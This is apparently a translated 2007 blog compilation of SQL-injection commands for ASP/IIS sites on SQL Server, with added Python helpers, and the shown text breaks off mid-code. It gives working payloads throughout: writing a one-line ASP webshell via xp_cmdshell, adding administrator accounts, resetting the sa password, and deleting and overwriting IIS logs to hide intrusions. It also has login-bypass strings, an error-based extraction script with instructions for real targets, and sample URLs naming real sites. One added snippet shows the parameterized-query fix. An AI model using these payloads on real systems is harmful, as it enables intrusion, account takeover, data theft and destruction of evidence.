The most detailed compilation of SQL-injection-related commands
Author: 叶子 (elva). Posted Mon, 22 Oct 2007. Source: http://www.shnenglu.com/elva/archive/2007/10/22/34820.html
QUOTE:
1. Writing an ASP file (one-line webshell) with the ^ escape character:
• http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

• echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
(^ is cmd.exe's escape character: without it, < > and ( ) would be interpreted by the shell as redirection and grouping instead of being written into the file.)

2. Display the SQL Server version:
• http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
• http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Microsoft VBScript compilation error '800a03f6'
Expected 'End'
/iisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp, line 17
(The VBScript error is only the 500-100.asp custom error page failing to render; the useful part is the ODBC line, which carries the version string verbatim.)
3. While testing some foreign websites I had clearly established that a vulnerability existed, yet could not match it to any of the three usual types. It then occurred to me that SQL can query with the "in" keyword, for example "select * from mytable where id in(1)": the value in the parentheses is the data we submit, and the result is exactly the same as "select * from mytable where id=1". So by appending ") and 1=1 and 1 in(1" to the URL, the original SQL becomes "select * from mytable where id in(1) and 1=1 and 1 in(1)", and the long-awaited page appears. Let us call this type "included number" for now; you will have guessed there is also an "included string" type, caused by queries such as "select * from mytable where name in('firstsee')".
4. Check whether the xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
Command to restore the xp_cmdshell extended stored procedure:
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--

5. Write a command line or program into the startup group (the Run key):
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'


6. View the current database name:
• http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n)   (replace n with 0,1,2,3... to step through the other databases)
• http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript compilation error '800a03f6'
Expected 'End'
/iisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp, line 17
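The extraction that items 2 and 6 drive by hand, automated. This is an added example and not code from the original post: it builds the `and 1=convert(int,...)` probe, parses the leaked value out of the ODBC conversion error, and walks db_name(1..n). The target is a constructed stand-in (`fake_target`, with canned SQL Server 2000 error text and invented values); the parameter name `keyno` and every value it returns are assumptions, not data from a real server.

```python
"""Error-based extraction behind items 2 and 6 (added example, not from the original post)."""
import re
from typing import Callable, List, Optional
from urllib.parse import urlencode

# SQL Server 2000 wording (as in the error pages above) and the 2005+ wording.
_LEAK_RE = re.compile(
    r"(?:Syntax error converting the \w+ value|"
    r"Conversion failed when converting the \w+ value) '(?P<val>.*?)' to "
    r"(?:a column of )?data type int",
    re.DOTALL,
)

def build_payload(base_value: str, expr: str) -> str:
    """Turn a legitimate numeric parameter value into the error-forcing probe."""
    return f"{base_value} and 1=convert(int,{expr})--"

def extract_leaked_value(html: str) -> Optional[str]:
    """The string SQL Server refused to convert, or None if the page shows no such error."""
    m = _LEAK_RE.search(html)
    return m.group("val") if m else None

# ---- constructed stand-in for the vulnerable page (assumption, not a real target) ----
_FAKE_DB = {
    "@@version": "Microsoft SQL Server 2000 - 8.00.760 (Intel X86)",
    "db_name()": "huidahouse",
    "db_name(1)": "master", "db_name(2)": "tempdb", "db_name(3)": "model",
    "db_name(4)": "msdb", "db_name(5)": "huidahouse",
    "system_user": "sa", "@@servername": "WEB01",
}

def fake_target(param_value: str) -> str:
    """Mimics display.asp: a plain id gives a normal page; a probe leaks through the ODBC error."""
    m = re.search(r"and 1=convert\(int,(.+?)\)--$", param_value)
    if not m or m.group(1) not in _FAKE_DB:
        return "<html>normal page</html>"   # db_name(n) of an unused id is NULL: no error raised
    return ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br>"
            "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the "
            f"nvarchar value '{_FAKE_DB[m.group(1)]}' to a column of data type int.")

def leak(expr: str, send: Callable[[str], str] = fake_target) -> Optional[str]:
    """One round trip: build the probe for `expr`, send it, parse the answer."""
    return extract_leaked_value(send(build_payload("1", expr)))

def enumerate_databases(max_id: int = 10, send: Callable[[str], str] = fake_target) -> List[str]:
    """Item 6's db_name(n) walk: ids with no database leak nothing and are skipped."""
    found = []
    for n in range(1, max_id + 1):
        name = leak(f"db_name({n})", send)
        if name is not None:
            found.append(name)
    return found

if __name__ == "__main__":
    print(urlencode({"keyno": build_payload("188", "@@version")}))   # what goes on the wire
    print(leak("@@version"))
    print(leak("db_name()"), enumerate_databases())
```

To use it against a real page, replace `fake_target` with a function that sends the parameter value and returns the response body; the parser is the only part that depends on the server's error wording.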
7. List the names of all databases:
select * from master.dbo.sysdatabases   (all columns)
select name from master.dbo.sysdatabases   (only the name column)

8. Running CMD commands on an injectable SQL Server without xp_cmdshell (through the sp_OA* OLE automation procedures, which by default only sysadmin may execute, so this replaces xp_cmdshell rather than bypassing a privilege check):
CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
-- Note: Run's third argument 'true' means wait for the program to finish; long-running commands such as ping need it.
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
-- FSO's OpenTextFile returns a TextStream object, so @file now holds an object token.
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

The following one-liner "adds the WEB user to the administrators group" (what the adsutil call actually does is register asp.dll as an in-process ISAPI application, so ASP code then runs inside inetinfo.exe as LocalSystem; see item 21):
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

The following one-liner runs an EXE program:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

Three ways to execute CMD commands from SQL:

First delete the July 18 log (ex050718.log):
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3) First set Jet sandbox mode. This is done by changing the registry through the xp_regwrite extended stored procedure, which is why an administrator editing the registry by hand cannot prevent it. For security reasons the default value does not allow this, which is why xp_regwrite is needed; xp_regwrite itself requires elevated rights, so for convenience the test here was run as sysadmin:
• exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Note (SandBoxMode values):
0   sandbox off everywhere (the default, per the original)
1   sandbox on for Access, off for other applications
2   sandbox off for Access, on for other applications
3   sandbox on everywhere
Value 1 is the one the exploit wants: SQL Server is a non-Access caller, so the sandbox no longer blocks shell() inside the Jet query.
• Only the command used with sysadmin rights is given here:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


• Reference command to create the linked server 'L0op8ack':
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

• How to use the linked server:

This method works, but unfortunately DB_OWNER rights are not enough; you need at least sysadmin, or securityadmin plus setupadmin:
sp_addlinkedserver requires sysadmin or setupadmin
sp_addlinkedsrvlogin requires sysadmin or securityadmin
In the end only sa, or an account holding setupadmin plus securityadmin, can use it;
no administrator grants an ordinary account those roles.

Not very practical; recorded only as a learning note.

The rough procedure follows. If you are not sysadmin, the permission check on IAS.mdb fails:
in my test, user hacker was granted setupadmin plus securityadmin and using ias.mdb still failed.
You need to find an .mdb that ordinary users can access:

• Create the linked server "L0op8ack": EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
• exec sp_addlinkedsrvlogin 'L0op8ack','false';-- or
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
• SELECT * FROM OPENQUERY(L0op8ack, 'SELECT shell("cmd.exe /c net user")');--
• exec sp_droplinkedsrvlogin 'L0op8ack','false';--
• exec sp_dropserver 'L0op8ack';--

Then copy another file over the July 18 log file:
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9. Use UPDATE to change data in a table:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
The 16-character MD5 of user www's password is set to a0b923820dcc509a, i.e. the password becomes 1;
the 32-character MD5 value is:   , password:

10. Using the export-table-contents-to-file feature
SQL Server has the BCP command, which exports a table's contents to a text file at a specified location. Using it, we can first create a temporary table, enter an ASP trojan into it line by line, then export it with BCP to form an ASP file.
The command-line format is:
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp -c -S localhost -U sa -P upload ('S' is the server on which to run the query, 'U' the user name, 'P' the password; the result is an uploaded runcommand.asp trojan)
11. Creating a table, inserting data and reading it back:
• Create the table:
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
• Insert data into the table:
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 @result=name from upload.dbo.sysobjects where xtype='U' and status>0 insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
• Read data back from the table (the char column cannot be compared with an int, so the conversion error carries the value):
' and 1=(select count(*) from cyfd where gyfd >1)--

• Drop the temporary table:
';drop table cyfd;--

12. Changing sa's password directly with a SQL statement:
• update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01. This sets sa's password to 111111. Heh, the remedy is to delete sa; for how, see my "Completely removing the sa backdoor".
• List all database logins on this machine:
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins

• Changing the sa password: after connecting with a SQL exploitation tool, run:
exec sp_password NULL,'newpassword','sa'

13. Query all table names and table structures in the dvbbs database:
• select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
• select * from dvbbs.dbo.syscolumns where id=1426104121

14. Manually back up the current database:
Full backup:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH FORMAT--
Differential backup:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
15. Adding (and removing) a user test with SA rights:
exec master.dbo.sp_addsrvrolemember test,sysadmin

cmd.exe /c isql -E /U alma /P /i K:\test.qry

16. select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
lists the names of all user-created tables in the ChouYFD database.
Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0

17.
• http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns (optionally: where id=1234)
lists the column names of every table in the rdweb database
• select * from dvbbs.dbo.syscolumns where id=5575058
lists all column names of the table with id=5575058 in the dvbbs database

18. Delete-record command: delete from Dv_topic where boardid=5 and topicid=7978

19. Collected strings for bypassing login checks to reach the admin area:
1) ' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6) or 1=1--
7) ' or 'a='a
8) " or "a"="a
9) ') or ('a'='a
10) ") or ("a"="a
11) ) or (1=1
12) 'or''='
13) 人气%' and 1=1 and '%'='   (人气 is just a sample search keyword; this variant is for a LIKE '%...%' clause)
Which one applies depends on how the original query quotes and parenthesizes the value; a string that does not match the quoting context produces a syntax error rather than a bypass.
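Why these strings work and why parameterization stops them, as an added example that is not part of the original post. SQLite stands in for SQL Server here because it accepts the same quote and `--` tricks, so the effect on the WHERE clause is identical; the `admin` table, the account in it and the two `login` functions are assumptions.

```python
"""Login bypass strings from item 19 against a constructed table (added example, not from the post)."""
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory table with one constructed account (assumption, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin(username text, password text)")
    conn.execute("insert into admin values ('admin', 's3cret')")
    return conn

def login_vulnerable(conn, username: str, password: str) -> bool:
    """String concatenation, the pattern these payloads target."""
    sql = ("select count(*) from admin where username='" + username +
           "' and password='" + password + "'")
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return False   # syntax error: that string needs a different quoting context

def login_fixed(conn, username: str, password: str) -> bool:
    """Parameterized: the payload is compared as data and never parsed as SQL."""
    row = conn.execute("select count(*) from admin where username=? and password=?",
                       (username, password)).fetchone()
    return row[0] > 0

# (username, password) pairs built from item 19's strings. Which field the
# payload goes in matters: AND binds tighter than OR, so ' or 'a'='a in the
# username field alone would still require the password to match.
BYPASS_ATTEMPTS = {
    "' or 1=1--":   ("' or 1=1--", "anything"),   # the comment swallows the password check
    "' or''='":     ("x", "' or''='"),             # password='' or ''='' is always true
    "' or 'a'='a":  ("x", "' or 'a'='a"),          # same, with a literal comparison
    '" or 1=1--':   ('" or 1=1--', "anything"),    # wrong quote for this query: no effect
}

def bypass_matrix(conn) -> dict:
    """Map each payload to (vulnerable login result, fixed login result)."""
    return {name: (login_vulnerable(conn, u, p), login_fixed(conn, u, p))
            for name, (u, p) in BYPASS_ATTEMPTS.items()}

if __name__ == "__main__":
    for name, (vuln, fixed) in bypass_matrix(make_db()).items():
        print(f"{name!r:16} vulnerable={vuln} fixed={fixed}")
```

The double-quote variant shows the caveat stated above: the application here quotes with single quotes, so `" or 1=1--` is just a strange username and the vulnerable login still fails.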

20. Summary of ways to find the website path:
1) Commands to view the WEB site installation directory:
• cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt   (try replacing 2 with 1, 3, 4)
type c:\test1.txt
del c:\test1.txt
Under NBSI the result is shown directly, so there is no need to redirect it into a file

2) Pick any image name on the website, say 123.jpg,
then write it into a batch file 123.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt

After running it: type c:\123.txt
and work the website path out from the listing

3) If the SQL Server and the web server are the same machine, and commands can be run, then:
redirect the command output into
%windir%\help\iishelp\common\404b.htm or 500.asp
(back those two files up before overwriting them), e.g.:
dir c:\ >%windir%\help\iishelp\common\404b.htm
then request any non-existent file, such as http://targetip/2.asp, and the 404 page displays the output

4) On Windows 2000: xp_regread of HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots yields the WEB path
On Windows 2003: no xp_regread method found
For example:
(1) Create a table cyfd (with column gyfd): http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
(2) Write the web path into it: http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
(3) Again force a type mismatch so the error shows it: http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: Syntax error converting the varchar value 'Y:\Web\烟台人才热线后台管理系统,,201 ' to a column of data type int.
TargetSite: Boolean Read()   Haha, the path is exposed.
(4) Finally drop the table: http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

5) Use the regedit command to export the registry, saving the result into the %windir%\help\iishelp\common\404b.htm or 500.asp page
regedit command syntax:
Regedit /L:system /R:user /E filename.reg Regpath
Parameter meanings:
/L:system specifies the path of the System.dat file.
/R:user specifies the path of the User.dat file.
/E tells the Registry Editor to export; after this switch, leave a space and give the name of the file to export to.
Regpath specifies which registry branch to export; if omitted, the entire registry is exported. "/L:system" and "/R:user" are optional; without them the Registry Editor uses "system.dat" and "user.dat" in the WINDOWS directory. If you booted into DOS from a floppy you must use "/L" and "/R" to give the exact paths of "system.dat" and "user.dat", otherwise the Registry Editor cannot find them. For example, after booting into DOS from a boot disk, the command to back up the registry is "Regedit /L:C:\windows\ /R:C:\windows\ /e regedit.reg", which backs up the whole registry into the WINDOWS directory as "regedit.reg"; typing "regedit /E D:\regedit.reg" instead backs up the whole registry to the root of D: (omitting "/L" and "/R") as "Regedit.reg". (The /L and /R switches are a Windows 9x leftover; on Windows 2000/2003 the registry is not kept in system.dat/user.dat and only /e and /s matter.)

regedit /s c:\adam.reg   (imports c:\adam.reg into the registry)
regedit /e c:\web.reg   (backs up the whole registry to c:\web.reg)
On Windows 2000: C:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
then request http://targetIP/2.asp
On Windows 2003: no method found; anyone who finds one, please publish it so we can discuss it.

6) On a virtual host, the files under %SystemRoot%\system32\inetsrv\MetaBack\ are IIS metabase backups and are readable by the web user; if the IIS configuration was backed up there, download it through a webshell and open it in Notepad to read the corresponding domain names and absolute web paths.
7) Creating a virtual directory through SQL injection, a way out when you have dbo rights but cannot find the absolute web path:
Very often an injection lets us list directories and run commands, yet the web directory is hard to find and so a webshell is hard to get; this trick works well:
• Create a virtual directory win pointing at c:\winnt\system32: exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
• Give the win directory permission to run ASP scripts: exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" -s:'
• Delete the virtual directory win: exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
• Test: http://127.0.0.1/win/test.asp
8) Using SQL statements to find the WEB directory. From experience, the order in which to suspect the web root is D:, then E:, then C:. First create a temporary table to hold the directory tree produced by master..xp_dirtree (executable by public), with:
;create table temp(dir nvarchar(255),depth varchar(255));-- The dir column holds the directory name and depth its depth. Then run xp_dirtree to obtain the directory tree of D::
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--

Before going further, check how many top-level folders D: has, to get a rough picture of it:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷'))>=number   (number=0,1,2,3...)

Next, find a few first-level subdirectories of the target site, such as user and photo, and use a filter to test whether the web root might be on this drive:
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)

If the statement returns true, the web root may be on this drive; to be surer, test a few more subdirectories:
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)

...

If every test returns true, the web root is very likely on this drive.

Assuming the web root is on this drive, obtain the depth of a first-level subdirectory with:
and (select depth from temp where dir='user')>=number   (number=1,2...)

If depth comes out as 3, user is a third-level directory on D:, so the web root is a second-level directory on D:.

We now know the drive and the depth of the root; to pin down its location, search from the root of D: one directory at a time. There is no need to learn every directory's name, which would take far too long.

Next, create another temporary table to hold every directory under one first-level subdirectory of D::

;create table temp1(dir nvarchar(255),depth varchar(255));--

Then store every directory under the first subdirectory of D: into temp1:
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
To store the directories under the second subdirectory of D: instead, change the second top 1 to top 2.

temp1 now holds every directory under that first-level subdirectory of D:; test, the same way, whether the root is under it:
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
If this returns true, the root may be under this subdirectory (remember to test several names); if every test returns false, the root is not here, and the same method fills temp1 with the directories under the 2nd, 3rd... subdirectory of D: to test each in turn. Be careful to clear temp1 before every new xp_dirtree.

Now suppose the web root is under a first-level subdirectory of D: named website (how to obtain that name needs no explanation by now). Since we know the root's depth is 2, we need to find which directory under website is the real web root.

With the same method, create a third temporary table:
;create table temp2(dir nvarchar(255),depth varchar(255));--

Then store every directory under the first subdirectory of D:\website into temp2:
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
To store the directories under the second subdirectory of website instead, change the second top 1 to top 2.

Now test, the same way, whether this directory is the root:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
If it returns true, try a few more names to confirm; if they all return true, this directory is the web root.


With the method above the web root can generally be recovered; suppose it is D:\website\www.
We can then back up the current database into that directory for download. Before the backup, empty temp, temp1 and temp2, and store the directory trees of C:, D: and E: in temp, temp1 and temp2 respectively.

After downloading the database, remember to DROP the three temporary tables. The downloaded database now contains the complete directory listings, including the admin directory and more.
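The search in 8) reduced to code, as an added example that is not from the original post. `FAKE_DISKS` is a constructed directory tree standing in for the target's drives, `xp_dirtree()` imitates the (dir, depth) rows master..xp_dirtree returns, and `find_web_root()` does with a loop what the text does with temp, temp1 and temp2, checking several marker folders at once instead of one at a time. Drive and folder names are assumptions.

```python
"""xp_dirtree-based web-root search from item 20.8 (added example, not from the original post)."""
from typing import Dict, List, Sequence, Tuple

# Constructed filesystem (assumption, not a real host): nested dicts, a leaf is an empty dict.
FAKE_DISKS: Dict[str, dict] = {
    "c:\\": {"WINNT": {"system32": {}}, "Program Files": {"Common Files": {}}},
    "d:\\": {"backup": {"old": {}},
             "website": {"www": {"user": {}, "photo": {}, "images": {}},
                         "logs": {}}},
    "e:\\": {"data": {"user": {}}},   # has 'user' but no 'photo': a false lead
}
# Folders the text excludes because every Windows machine has them
NOISE = {"Documents and Settings", "Program Files", "RECYCLER",
         "System Volume Information", "WINDOWS", "WINNT", "CAConfig", "wmpub"}

def _node(path: str) -> dict:
    """Resolve a path such as 'd:\\website\\' inside FAKE_DISKS."""
    drive, _, rest = path.partition("\\")
    node = FAKE_DISKS[drive + "\\"]
    for part in filter(None, rest.split("\\")):
        node = node[part]
    return node

def xp_dirtree(path: str) -> List[Tuple[str, int]]:
    """Rows like master..xp_dirtree: every subdirectory under `path` with its depth."""
    rows: List[Tuple[str, int]] = []
    def walk(node: dict, depth: int) -> None:
        for name, child in node.items():
            rows.append((name, depth))
            walk(child, depth + 1)
    walk(_node(path), 1)
    return rows

def contains_all(rows: Sequence[Tuple[str, int]], markers: Sequence[str]) -> bool:
    """The text's filter: count(*) where dir<>'m' is smaller than count(*) iff 'm' occurs."""
    return all(sum(1 for d, _ in rows if d != m) < len(rows) for m in markers)

def at_depth_one(rows: Sequence[Tuple[str, int]], markers: Sequence[str]) -> bool:
    """True when every marker is a direct child, i.e. this directory is the web root."""
    return all((m, 1) in rows for m in markers)

def find_web_root(markers: Sequence[str],
                  drives: Sequence[str] = ("d:\\", "e:\\", "c:\\")) -> str:
    """Return the directory whose direct children include all `markers`, or raise."""
    for drive in drives:                       # the text's order: D, E, then C
        if not contains_all(xp_dirtree(drive), markers):
            continue
        current = drive
        while True:
            rows = xp_dirtree(current)
            if at_depth_one(rows, markers):
                return current
            # Like refilling temp1/temp2 per child: descend into the first
            # depth-1 subdirectory whose own tree still holds all markers.
            for name, depth in rows:
                if depth == 1 and name not in NOISE and \
                        contains_all(xp_dirtree(current + name + "\\"), markers):
                    current = current + name + "\\"
                    break
            else:
                break                          # markers not below any child: try the next drive
    raise LookupError("no directory has all of %r as direct children" % (list(markers),))

if __name__ == "__main__":
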